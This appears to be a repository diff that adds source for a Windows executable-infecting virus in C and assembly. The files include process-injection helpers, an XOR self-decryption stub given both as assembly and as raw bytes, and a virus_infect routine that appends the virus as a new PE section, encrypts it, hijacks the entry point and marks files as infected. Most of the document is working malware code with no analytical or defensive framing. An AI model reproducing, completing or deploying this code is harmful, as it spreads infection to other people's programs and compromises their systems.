char cFileName[MAX_PATH];
char cAlternateFileName[14];
uint32_t dwFileType;
uint32_t dwCreatorType;
uint16_t wFinderFlags;
} WIN32_FIND_DATAA, *PWIN32_FIND_DATAA, *LPWIN32_FIND_DATAA;
typedef struct __FILE_DATA {
char *data;
uint32_t fileSz;
} file_data;
//ends with 0x00 struct
typedef struct __DIR_LIST {
char *fName;
int fNameLen;
FILETIME accessTime;
FILETIME writeTime;
char isDir; //either 1 == True or 0 == False;
struct __DIR_LIST *next;
} dir_list;
#define FILE_ATTRIBUTE_DIRECTORY 0x10
#define INVALID_HANDLE_VALUE -1
//process manipulation
//ends with 0x00 struct
typedef struct _PIDS {
uint32_t pid;
char *fName;
struct _PIDS *next;
} pids;
typedef struct _PROC_INJECTION {
void *mem;
size_t memSz;
void *proc;
} proc_injection;
typedef struct _STARTUPINFOA {
uint32_t cb;
char *reserved;
char *desktop;
char *title;
uint32_t dwX;
uint32_t dwY;
uint32_t dwXSize;
uint32_t dwYSize;
uint32_t dwXCountChars;
uint32_t dwYCountChars;
uint32_t dwFileAttribute;
uint32_t dwFlags;
uint16_t wShowWindow;
uint16_t cbReserved2;
char *lpReserved2;
void *hStdInput;
void *hStdOutput;
void *hStdError;
} STARTUPINFOA;
typedef struct _PROCESS_INFORMATION {
void *hProcess;
void *hThread;
uint32_t dwProcessId;
uint32_t dwThreadId;
} PROCESS_INFORMATION;
//the actual functions
int pic_gen_random(int max);
int pic_strlen(const char *str);
//the strcmp r either 1 (unequal) or 0 (equal)
int pic_strncmp(const char *str1, const char *str2, int len);
int pic_strcmp(const char *str1, const char *str2);
void *pic_memmem(const void *haystack, size_t haystackLen,
const void *needle, size_t needleLen);
void *pic_memcpy(void *dst, const void *src, size_t n);
void *pic_memset(void *dst, int c, size_t n);
//this strcat works different in the way that it returns a new string
//on allocated memory (allocated with pic_malloc())
char *pic_strcat(char *str1, const char *str2);
char *pic_strstr(char *haystack, char *needle);
int ascii_ucode_find(char *ascii, char *ucode, int len);
int message_box(char *text);
void *pic_malloc(size_t size);
void pic_free(void *mem);
void *pic_open_file(char *fname, unsigned int flags);
int pic_close_handle(void *handle);
char *pic_read_file_bin(char *fname, file_data *fileDat);
int pic_write_file_bin(char *fname, file_data *fileDat);
dir_list *list_windows_files(char *path);
dir_list *pic_get_devices();
void dir_list_append(dir_list *main, dir_list *toAppend);
//get_paths() returned list contains "." and "..". I was too lazy sry :S
dir_list *get_paths(char *root);
dir_list *get_exe_paths(char *root);
void pic_free_dir_list(dir_list *lst);
void *pic_create_thread(void *attr, size_t stackSz, void *startFunc,
void *param, uint32_t flags, uint32_t *id);
//process manipulation
int pic_create_proc(char *name);
void *pic_open_proc(uint32_t perms, int inherit, uint32_t pid);
pids *pic_enum_procs();
void pic_enum_procs_free(pids *p);
//the returned pointer needs to be freed
char *pic_get_proc_file_name(uint32_t pid);
void *pic_virtual_alloc_ex(void *proc, /*opt*/void *startAddr,
size_t sz, uint32_t allocType, uint32_t protect);
int pic_virtual_free_ex(void *proc, void *addr, size_t sz, uint32_t type);
int pic_write_proc_mem(void *proc, void *destAddr,
void *srcBuf, size_t sz, size_t *szWritten);
proc_injection *pic_inject_into_proc(void *proc, void *data,
size_t dataSz);
void pic_inject_into_proc_free(proc_injection *pi);
void *pic_create_remote_thread(void *proc, void *secAttrs,
size_t stackSz, void *entry,
void *param, uint32_t flags, uint32_t *tid);
//system information
//returns the windows directory in a string
//(you have to pic_free() it when you don't need it anymore)
char *pic_get_windows_directory();
//errors:
uint32_t pic_get_last_error();
//some flags we need they are usually defined somewhere in the windows
//headers but since we don't want to be depended on them we put
//the defines here:
//process access rights
#define PROCESS_CREATE_PROCESS 0x80
#define PROCESS_CREATE_THREAD 0x2
#define PROCESS_DUP_HANDLE 0x40
#define PROCESS_QUERY_INFORMATION 0x400
#define PROCESS_QUERY_LIMITED_INFORMATION 0x1000
#define PROCESS_SET_INFORMATION 0x200
#define PROCESS_SET_QUOTA 0x100
#define PROCESS_SUSPEND_RESUME 0x800
#define PROCESS_TERMINATE 0x1
#define PROCESS_VM_OPERATION 0x8
#define PROCESS_VM_READ 0x10
#define PROCESS_VM_WRITE 0x20
#define SYNCRONIZE 0x100000
//memory access rights
#define PAGE_NOACCESS 0x01
#define PAGE_READONLY 0x02
#define PAGE_READWRITE 0x04
#define PAGE_WRITECOPY 0x08
#define PAGE_EXECUTE 0x10
#define PAGE_EXECUTE_READ 0x20
#define PAGE_EXECUTE_READWRITE 0x40
#define PAGE_EXECUTE_WRITECOPY 0x80
#define PAGE_GUARD 0x100
#define PAGE_NOCACHE 0x200
#define PAGE_WRITECOMBINE 0x400
#define MEM_COMMIT 0x1000
#define MEM_RESERVE 0x2000
#define MEM_DECOMMIT 0x4000
#define MEM_RELEASE 0x8000
#define MEM_FREE 0x10000
#define MEM_PRIVATE 0x20000
#define MEM_MAPPED 0x40000
#define MEM_RESET 0x80000
#define MEM_TOP_DOWN 0x100000
#define MEM_WRITE_WATCH 0x200000
#define MEM_PHYSICAL 0x400000
#define MEM_ROTATE 0x800000
#define MEM_LARGE_PAGES 0x20000000
#define MEM_4MB_PAGES 0x80000000
#define SEC_FILE 0x800000
#define SEC_IMAGE 0x1000000
#define SEC_PROTECTED_IMAGE 0x2000000
#define SEC_RESERVE 0x4000000
#define SEC_COMMIT 0x8000000
#define SEC_NOCACHE 0x10000000
#define SEC_WRITECOMBINE 0x40000000
#define SEC_LARGE_PAGES 0x80000000
#endif

35
stub.asm Normal file
View File

@ -0,0 +1,35 @@
bits 32
mov esi, 0x55555555 ;rva to data
mov ebx, 0x66666666 ;dataSz
mov ecx, 0x00 ;dataCounter
mov edi, 0x77777777 ;rva to key
mov edx, 0x00 ;keyCounter
mov eax, [fs:0x30]
mov eax, [eax+0x08] ;imageBase
add esi, eax
add edi, eax
push eax
s:
cmp ecx, ebx
je end
mov al, [esi+ecx]
xor al, [edi+edx]
mov [esi+ecx], al
inc ecx
inc edx
mov al, [edi+edx]
cmp al, 0x00
je zeroKeyCnt
jmp s
zeroKeyCnt:
xor edx, edx
jmp s
end:
mov ecx, 0x99999999 ;rva entry
pop eax
add eax, ecx
jmp eax

5
test.c Normal file
View File

@ -0,0 +1,5 @@
int main(void) {
int i = 0;
while (1) i++;
return 0;
}

363
virus.c Normal file
View File

@ -0,0 +1,363 @@
#include "virus.h"
static void *virus_encrypt(void *image, void *vir,
uint32_t virSz, char *key);
static void *virus_add_dec_stub(void *image, uint32_t rvaData,
uint32_t dataSz, uint32_t rvaKey,
uint32_t rvaEntry);
void virus_get_pointers(virus_pointers *vptrs) {
vptrs->virusStart = start(); //aaa.c
vptrs->virusEnd = end(); //zzz.c
vptrs->virusSz = (vptrs->virusEnd - vptrs->virusStart);
vptrs->virusEntry = virus_loader();
vptrs->virusBase = get_peb_data(1);
return;
}
void *virus_encrypt(void *image, void *vir,
uint32_t virSz, char *key)
{
int virCnt, keyCnt = 0;
char *secName;
void *writePtr;
for (virCnt = 0; virCnt < virSz; virCnt++) {
((char*)vir)[virCnt] ^= ((char*)key)[keyCnt];
keyCnt++;
if (((char*)key)[keyCnt] == '\x00') keyCnt = 0;
}
for (int i = 0; i < 16; i++) {
secName = sections_by_index_get_name(image, i);
if (NULL == secName) return NULL; //we found no exe section
if (1 == sections_by_name_is_readable(image, secName)) {
writePtr = sections_by_name_enlarge(image, secName,
key, (pic_strlen(key)+1));
if (NULL != writePtr) return writePtr;
}
}
return NULL;
}
void *virus_add_dec_stub(void *image, uint32_t rvaData,
uint32_t dataSz, uint32_t rvaKey,
uint32_t rvaEntry)
{
uint32_t checkCnt;
uint32_t *writePtr;
char *secName;
char stub[77];
stub[0] = '\xbe'; stub[1] = '\x55'; stub[2] = '\x55'; stub[3] = '\x55';
stub[4] = '\x55'; stub[5] = '\xbb'; stub[6] = '\x66'; stub[7] = '\x66';
stub[8] = '\x66'; stub[9] = '\x66'; stub[10] = '\xb9'; stub[11] = '\x0';
stub[12] = '\x0'; stub[13] = '\x0'; stub[14] = '\x0'; stub[15] = '\xbf';
stub[16] = '\x77'; stub[17] = '\x77'; stub[18] = '\x77'; stub[19] = '\x77';
stub[20] = '\xba'; stub[21] = '\x0'; stub[22] = '\x0'; stub[23] = '\x0';
stub[24] = '\x0'; stub[25] = '\x64'; stub[26] = '\xa1'; stub[27] = '\x30';
stub[28] = '\x0'; stub[29] = '\x0'; stub[30] = '\x0'; stub[31] = '\x8b';
stub[32] = '\x40'; stub[33] = '\x8'; stub[34] = '\x1'; stub[35] = '\xc6';
stub[36] = '\x1'; stub[37] = '\xc7'; stub[38] = '\x50'; stub[39] = '\x39';
stub[40] = '\xd9'; stub[41] = '\x74'; stub[42] = '\x18'; stub[43] = '\x8a';
stub[44] = '\x4'; stub[45] = '\xe'; stub[46] = '\x32'; stub[47] = '\x4';
stub[48] = '\x17'; stub[49] = '\x88'; stub[50] = '\x4'; stub[51] = '\xe';
stub[52] = '\x41'; stub[53] = '\x42'; stub[54] = '\x8a'; stub[55] = '\x4';
stub[56] = '\x17'; stub[57] = '\x3c'; stub[58] = '\x0'; stub[59] = '\x74';
stub[60] = '\x2'; stub[61] = '\xeb'; stub[62] = '\xe8'; stub[63] = '\x31';
stub[64] = '\xd2'; stub[65] = '\xeb'; stub[66] = '\xe4'; stub[67] = '\xb9';
stub[68] = '\x99'; stub[69] = '\x99'; stub[70] = '\x99'; stub[71] = '\x99';
stub[72] = '\x58'; stub[73] = '\x1'; stub[74] = '\xc8'; stub[75] = '\xff';
stub[76] = '\xe0';
checkCnt = 0;
for (int i = 0; i < STUB_LEN; i++) {
writePtr = (uint32_t*)&((char*)stub)[i];
if ((*writePtr) == 0x55555555) {
(*writePtr) = rvaData;
checkCnt++;
}
if ((*writePtr) == 0x66666666) {
(*writePtr) = dataSz;
checkCnt++;
}
if ((*writePtr) == 0x77777777) {
(*writePtr) = rvaKey;
checkCnt++;
}
if ((*writePtr) == 0x99999999) {
(*writePtr) = rvaEntry;
checkCnt++;
}
}
//of cause this is useless untill we have changing stubs...
if (checkCnt != 0x04) return NULL;
for (int i = 0; i < 16; i++) {
secName = sections_by_index_get_name(image, i);
if (NULL == secName) return NULL; //we found no exe section
if (1 == sections_by_name_is_executable(image, secName)) {
writePtr = sections_by_name_enlarge(image, secName,
stub, STUB_LEN);
if (NULL != writePtr) return writePtr;
}
}
return NULL;
}
int virus_check_for_section(char *file, char *secName) {
char *nPtr;
int i = 0;
while (nPtr = sections_by_index_get_sh(file, i)) {
if (pic_strncmp(secName, nPtr, 8) == 0) {
return 1;
}
i++;
}
return 0;
}
int virus_check_for_infection(char *file) {
char *sName;
int i = 0;
while (sName = sections_by_index_get_name(file, i)) {
if (sections_by_name_is_writable(file, sName)
&& sections_by_name_is_executable(file, sName)) {
return 1;
}
}
return 0;
}
//This function needs to be improved a bit but it should work for now.
//One important thing is checking for reading and writing permissions
//before infection.
int virus_infect(char *path, char *secName, uint32_t secFlags) {
file_data fdat, nfdat;
virus_pointers vptrs;
void *oldRvaPhldr, *newSec, *epRva;
hdrs peNewHdrs, peOldHdrs;
uint32_t oldEpRva, oldEpPhldr = 0x44444444;
IMAGE_SECTION_HEADER *sh;
char key[3], *keyPtr;
int i;
key[0] = 'a';
key[1] = 'b';
key[2] = '\x00';
virus_get_pointers(&vptrs);
if (NULL == pic_read_file_bin(path, &fdat)) return -1;
if (virus_check_for_section(fdat.data, secName)) {
pic_free(fdat.data);
return -1;
}
if (virus_check_for_infection(fdat.data)) {
pic_free(fdat.data);
return -1;
}
nfdat.fileSz = sections_get_sizeof_image_after_add_section(fdat.data,
fdat.fileSz,
vptrs.virusSz);
nfdat.data = pic_malloc(nfdat.fileSz);
newSec = sections_add_section(fdat.data, fdat.fileSz,
nfdat.data, nfdat.fileSz,
secName, vptrs.virusSz);
pic_memcpy(newSec, vptrs.virusStart, vptrs.virusSz);
sections_by_name_set_characteristics(nfdat.data, secName, secFlags);
/* since vptrs->virusEntry points on the currently running exe
we need to calculate the entry point of the new executable */
epRva = vptrs.virusEntry;
epRva -= vptrs.virusStart;
//epRva is now just the offset from the section start
hdrs_init(&peNewHdrs, nfdat.data);
//FIXME: just until the 64bit version is ready
if (peNewHdrs.type == 64) {
pic_free(nfdat.data);
pic_free(fdat.data);
return -1;
}
sh = sections_by_name_get_sh(nfdat.data, secName);
epRva += sh->VirtualAddress;
//we will use oldEPRva later.
oldEpRva = hdrs_get_address_of_entry_point(&peNewHdrs);
hdrs_set_address_of_entry_point(&peNewHdrs,
(uint32_t)epRva);
hdrs_destroy(&peNewHdrs);
pic_free(fdat.data);
/* In the below snippet we hope there is no other 44444444
byte series in the scanned bytes. If that would be the case
the code might brake the new executable. */
uint8_t byteBeforeSig = 0x00;
i = 0;
do {
oldRvaPhldr = pic_memmem(newSec, vptrs.virusSz,
&oldEpPhldr, sizeof (uint32_t));
if (NULL != oldRvaPhldr) {
pic_memcpy(oldRvaPhldr, &oldEpRva, sizeof (uint32_t));
i++;
}
} while (NULL != oldRvaPhldr);
if (2 != i) {
//something went wrong with the 44444444 searching stuff
pic_free(nfdat.data);
return -1;
}
hdrs_init(&peNewHdrs, nfdat.data);
keyPtr = virus_encrypt(nfdat.data, newSec, vptrs.virusSz, key);
keyPtr = virus_add_dec_stub(nfdat.data, ptr_to_rva(nfdat.data, newSec),
vptrs.virusSz,
ptr_to_rva(nfdat.data, keyPtr),
hdrs_get_address_of_entry_point(&peNewHdrs));
virus_sign_infected(nfdat.data, STUB_LEN);
hdrs_set_address_of_entry_point(&peNewHdrs, ptr_to_rva(nfdat.data,
keyPtr));
hdrs_destroy(&peNewHdrs);
if (NULL == pic_write_file_bin(path, &nfdat)) {
pic_free(nfdat.data);
return -1;
}
pic_free(nfdat.data);
return 0;
}
/* This function checks its return address whether it
is whithin the section of the virus or not.
If it is called by the virus it will return its start address
if not it will call the main function. */
void *virus_loader() {
void *retAddr;
void *ownAddr;
int64_t offset;
__asm__("call nextIns;\r\n"
"nextIns:\r\n"
"pop %0;\r\n"
: "=r" (ownAddr)
:
:);
ownAddr -= 0x0b;
#ifdef __amd64__
__asm__(".intel_syntax;\r\n"
"mov %0, [rbp+0x08];\r\n" //return address;
".att_syntax;\r\n"
: "=r" (retAddr)
:
:);
#else
__asm__(".intel_syntax;\r\n"
"mov %0, [ebp+0x04];\r\n" //return address;
".att_syntax;\r\n"
: "=r" (retAddr)
:
:);
#endif
offset = (int64_t)(ownAddr - retAddr); //this is very hacky since
//the function will not work
//if it's called from a function
//which lies behind this one
if (offset < 0x1000 && offset > 0) return ownAddr;
main();
#ifdef __amd64__
__asm__(".intel_syntax;\r\n"
"mov rax, %0\r\n"
"add eax, 0x44444444\r\n"
"jmp rax\r\n"
".att_syntax\r\n"
:
:"r"(get_peb_data(1))
:);
#else
__asm__(".intel_syntax;\r\n"
"mov eax, %0\r\n"
"add eax, 0x44444444\r\n"
"jmp eax\r\n"
".att_syntax\r\n"
:
:"r"(get_peb_data(1))
:);
#endif
return NULL;
}
/* returns:
* -1 : error
* 1-100 : likelyhood of infection
*/
int virus_check_infected(infect_info *ii, char *path, uint32_t stubSz) {
file_data fdat;
hdrs h;
virus_pointers vptrs;
IMAGE_SECTION_HEADER *sh;
uint32_t numSecs;
void *of;
virus_get_pointers(&vptrs);
if (NULL == pic_read_file_bin(path, &fdat)
|| NULL == (of = pic_open_file(path, 0x02 /*READWRITE*/))) {
pic_memset(ii, 0, sizeof (infect_info));
return -1;
}
pic_close_handle(of);
if (-1 == hdrs_init(&h, fdat.data)) return -1;
numSecs = hdrs_get_number_of_sections(&h);
if (16 < numSecs) return -1;
ii->numSecs = numSecs;
ii->infLike = 1;
for (int i = 0; i < numSecs; i++) {
sh = sections_by_index_get_sh(fdat.data, i);
ii->secs[i].freeSpace = sh->SizeOfRawData;
ii->secs[i].freeSpace -= sh->Misc.VirtualSize;
pic_memcpy(ii->secs[i].name, sh->Name, 8);
ii->secs[i].exe = sections_by_name_is_executable(fdat.data,
sh->Name);
ii->secs[i].read = sections_by_name_is_readable(fdat.data,
sh->Name);
ii->secs[i].write = sections_by_name_is_writable(fdat.data,
sh->Name);
if (ii->secs[i].exe && (ii->secs[i].freeSpace > stubSz))
ii->infLike = 0;
}
return ii->infLike;
}
//checks if a binary (scanned with check_infected) has a section with
//the given name (1 = it has; 0 = it hasn't)
int virus_check_for_name_in_sections(infect_info *ii, char *name) {
section *secCur;
secCur = ii->secs;
for (int i = 0; i < ii->numSecs; i++) {
if (!pic_strncmp(secCur[i].name, name, 8)) return 1;
}
return 0;
}
void virus_sign_infected(char *img, uint32_t stubSz) {
uint32_t numSecs;
hdrs h;
IMAGE_SECTION_HEADER *sh;
hdrs_init(&h, img);
numSecs = hdrs_get_number_of_sections(&h);
hdrs_destroy(&h);
for (int i = 0; i < numSecs; i++) {
sh = sections_by_index_get_sh(img, i);
if (sh->Characteristics & IMAGE_SCN_MEM_EXECUTE) {
while (stubSz <= (sh->SizeOfRawData - sh->Misc.VirtualSize))
sh->Misc.VirtualSize += stubSz;
}
}
}

38
virus.h Normal file
View File

@ -0,0 +1,38 @@
#include "stdfuncs.h"
#include "aaa.h"
#include "zzz.h"
#include "pic-peter/peter.h"
#include "peb.h"
#define STUB_LEN 77
typedef struct _VPTRS {
void *virusStart;
void *virusEnd;
int32_t virusSz;
void *virusEntry;
void *virusBase;
} virus_pointers;
typedef struct {
char exe;
char read;
char write;
char name[8];
uint32_t freeSpace;
} section;
typedef struct {
section secs[16];
uint32_t numSecs;
char infLike; //the higher the value
//the more likely is an infection
} infect_info;
void *virus_loader();
int virus_infect(char *path, char *secName, uint32_t secFlags);
void virus_get_pointers(virus_pointers *vptrs);
int virus_check_infected(infect_info *ii,
char *path, uint32_t stubSz);
void virus_sign_infected(char *img, uint32_t stubSz);
int virus_check_for_name_in_sections(infect_info *ii, char *name);

177
winfuncs.h Normal file
View File

@ -0,0 +1,177 @@
#ifndef WINFUNCS
#define WINFUNCS
#include <stdint.h>
#include <stddef.h>
#if defined(__amd64__)
typedef void (*srandd)(unsigned int *)__attribute__((ms_abi));
typedef int (*randd)()__attribute__((ms_abi));
typedef int (*timee)(int *)__attribute__((ms_abi));
typedef void *(*get_proc_heap)()__attribute__((ms_abi));
typedef void *(*heap_alloc)(void *heap, uint32_t flags, size_t size)__attribute__((msabi));
typedef void *(*heap_free)(void *heap, uint32_t flags, void *mem)__attribute__((msabi));
typedef int (*msg_box)(void *window, char *text, char *caption, unsigned int type)__attribute__((msabi));
typedef void *(*open_file)(char *name, void *ofStruct, unsigned int style)__attribute__((msabi));
typedef int (*read_file)(void *handle, void *buffer, uint32_t nrBytesToRead, uint32_t *nrBytesRead, void *overlapped)__attribute__((ms_abi));
typedef int (*close_handle)(void *handle)__attribute__((ms_abi));
typedef int (*write_file) (void *handle, char *buffer, uint32_t nrBytesToWrite, uint32_t *ntBytesWritten, void *overlapped)__attribute__((ms_abi));
typedef void *(*find_first_file)(char *path, void *find_data)__attribute__((ms_abi));
typedef void *(*find_next_file)(void *handle, void *find_data)__attribute__((ms_abi));
typedef int (*find_close)(void *handle)__attribute__((ms_abi));
typedef uint32_t (*get_logical_drive_strings)(uint32_t len, char *buffer)__attribute__((ms_abi));
typedef unsigned int (*get_windows_directory)(char *buffer, unsigned int size)__attribute__((ms_abi));
typedef void *(*create_thread)(void *attributes, size_t stackSz, void *startFunc, void *param, uint32_t flags, uint32_t *id)__attribute__((ms_abi));
//process manipulation
typedef int (*create_process)(char *app, char *cmd, void *secAttr, void *threadAttr, int inheritHandle, uint32_t creationFlags, void *env, char *currentDir, void *startupInfo, void *procInfo)__attribute__((ms_abi));
typedef void *(*open_process)(uint32_t perms, int inherit, uint32_t pid)__attribute__((ms_abi));
typedef int (*enum_processes)(uint32_t *procs, uint32_t sz, uint32_t *retSz)__attribute__((ms_abi));
typedef uint32_t (*get_module_filename_ex)(void *proc, void *mod, char *buf, uint32_t bufSz)__attribute__((msabi));
typedef void *(*virtual_alloc_ex)(void *proc, /*opt*/void *startAddr, size_t sz, uint32_t allocType, uint32_t protect)__attribute__((msabi));
typedef int (*virtual_free_ex)(void *proc, void *addr, size_t sz, uint32_t type)__attribute__((msabi));
typedef int (*write_process_memory)(void *proc, void *destAddr, void *srcBuf, size_t sz, size_t *szWritten)__attribute__((msabi));
typedef void *(*create_remote_thread)(void *proc, void *secAttrs, size_t stackSz, void *entry, void *param, uint32_t flags, uint32_t *tid)__attribute__((msabi));
//sockets
typedef int (*wsa_startup)(uint16_t, void *)__attribute__((msabi));
typedef int (*fp_socket)(int af, int type, int proto)__attribute__((msabi));
//void = sockaddr
typedef int (*fp_connect)(int sock, void *name, int nameLen)__attribute__((msabi));
typedef int (*wsa_cleanup)(void)__attribute__((msabi));
typedef int (*fp_send)(int sock, const char *buf, int len, int flags)__attribute__((msabi));
typedef int (*fp_recv)(int sock, char *buf, int len, int flags)__attribute__((msabi));
typedef int (*s_close)(int sock)__attribute__((msabi));
//registry:
typedef long (*reg_open_key_ex_a)(void *hkey, char *subKey, uint32_t options, uint32_t samDesire, void **result)__attribute__((msabi));
typedef long (*reg_get_value_a)(void *hkey, char *subKey, char *value, uint32_t flags, uint32_t *type, void *data, uint32_t *dataSz)__attribute__((msabi));
typedef long (*reg_close_key)(void *hkey)__attribute__((msabi));
//errors:
typedef uint32_t (*get_last_error)()__attribute__((msabi));
#else
typedef void (*srandd)(unsigned int *)__attribute__((stdcall));
typedef int (*randd)()__attribute__((stdcall));
typedef int (*timee)(int *)__attribute__((stdcall));
typedef void *(*get_proc_heap)()__attribute__((stdcall));
typedef void *(*heap_alloc)(void *heap, uint32_t flags, size_t size)__attribute__((stdcall));
typedef void *(*heap_free)(void *heap, uint32_t flags, void *mem)__attribute__((stdcall));
typedef int (*msg_box)(void *window, char *text, char *caption, unsigned int type)__attribute__((stdcall));
typedef void *(*open_file)(char *name, void *ofStruct, unsigned int style)__attribute__((stdcall));
typedef int (*read_file)(void *handle, void *buffer, uint32_t nrBytesToRead, uint32_t *nrBytesRead, void *overlapped)__attribute__((stdcall));
typedef int (*close_handle)(void *handle)__attribute__((stdcall));
typedef int (*write_file) (void *handle, char *buffer, uint32_t nrBytesToWrite, uint32_t *ntBytesWritten, void *overlapped)__attribute__((stdcall));
typedef void *(*find_first_file)(char *path, void *find_data)__attribute__((stdcall));
typedef void *(*find_next_file)(void *handle, void *find_data)__attribute__((stdcall));
typedef int (*find_close)(void *handle)__attribute__((stdcall));
typedef uint32_t (*get_logical_drive_strings)(uint32_t len, char *buffer)__attribute__((stdcall));
typedef unsigned int (*get_windows_directory)(char *buffer, unsigned int size)__attribute__((stdcall));
typedef void *(*create_thread)(void *attributes, size_t stackSz, void *startFunc, void *param, uint32_t flags, uint32_t *id)__attribute__((stdcall));
//process manipulation
typedef int (*create_process)(char *app, char *cmd, void *secAttr, void *threadAttr, int inheritHandle, uint32_t creationFlags, void *env, char *currentDir, void *startupInfo, void *procInfo)__attribute__((stdcall));
typedef void *(*open_process)(uint32_t perms, int inherit, uint32_t pid)__attribute__((stdcall));
typedef int (*enum_processes)(uint32_t *procs, uint32_t sz, uint32_t *retSz)__attribute__((stdcall));
typedef uint32_t (*get_module_filename_ex)(void *proc, void *mod, char *buf, uint32_t bufSz)__attribute__((stdcall));
typedef void *(*virtual_alloc_ex)(void *proc, /*opt*/void *startAddr, size_t sz, uint32_t allocType, uint32_t protect)__attribute__((stdcall));
typedef int (*virtual_free_ex)(void *proc, void *addr, size_t sz, uint32_t type)__attribute__((stdcall));
typedef int (*write_process_memory)(void *proc, void *destAddr, void *srcBuf, size_t sz, size_t *szWritten)__attribute__((stdcall));
typedef void *(*create_remote_thread)(void *proc, void *secAttrs, size_t stackSz, void *entry, void *param, uint32_t flags, uint32_t *tid)__attribute__((stdcall));
//sockets
typedef int (*wsa_startup)(uint16_t, void *)__attribute__((stdcall));
typedef int (*fp_socket)(int af, int type, int proto)__attribute__((stdcall));
//void = sockaddr
typedef int (*fp_connect)(int sock, void *name, int nameLen)__attribute__((stdcall));
typedef int (*wsa_cleanup)(void)__attribute__((stdcall));
typedef int (*fp_send)(int sock, const char *buf, int len, int flags)__attribute__((stdcall));
typedef int (*fp_recv)(int sock, char *buf, int len, int flags)__attribute__((stdcall));
typedef int (*s_close)(int sock)__attribute__((stdcall));
//registry:
typedef long (*reg_open_key_ex_a)(void *hkey, char *subKey, uint32_t options, uint32_t samDesire, void **result)__attribute__((stdcall));
typedef long (*reg_get_value_a)(void *hkey, char *subKey, char *value, uint32_t flags, uint32_t *type, void *data, uint32_t *dataSz)__attribute__((stdcall));
typedef long (*reg_close_key)(void *hkey)__attribute__((stdcall));
//errors:
typedef uint32_t (*get_last_error)()__attribute__((stdcall));
#endif
#endif

17
zzz.c Normal file
View File

@ -0,0 +1,17 @@
#include "zzz.h"
void *end() {
void *end;
__asm__("call nextIns;\r\n"
"nextIns:\r\n"
"pop %0\r\n"
: "=r" (end)
:
:);
end += 16;
return end;
}

1
zzz.h Normal file
View File

@ -0,0 +1 @@
void *end();